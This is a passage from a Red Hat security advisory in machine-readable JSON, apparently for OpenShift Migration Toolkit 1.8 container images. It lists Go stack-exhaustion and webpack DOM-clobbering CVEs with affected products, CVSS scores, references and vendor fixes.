"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion"
},
{
"cve": "CVE-2024-34158",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2024-09-06T21:20:12.126400+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310529"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go/build/constraint package of the Golang standard library. Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-1325: Improperly Controlled Sequential Memory Allocation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token-based multi-factor authentication (MFA) and is governed by least privilege to ensure only authorized users and roles can execute or modify code. Static code analysis and peer reviews enforce strong input validation and error handling, preventing improperly validated inputs from causing system instability, data exposure, or privilege escalation. In the event of successful exploitation, process isolation limits the impact of excessive sequential memory allocation by restricting memory use per process, preventing any single process from exhausting system resources. Finally, the platform uses memory protection mechanisms such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) to reduce the risk of memory allocation-based attacks.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34158"
},
{
"category": "external",
"summary": "RHBZ#2310529",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310529"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34158",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34158"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34158",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34158"
},
{
"category": "external",
"summary": "https://go.dev/cl/611240",
"url": "https://go.dev/cl/611240"
},
{
"category": "external",
"summary": "https://go.dev/issue/69141",
"url": "https://go.dev/issue/69141"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3107",
"url": "https://pkg.go.dev/vuln/GO-2024-3107"
}
],
"release_date": "2024-09-06T21:15:12.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
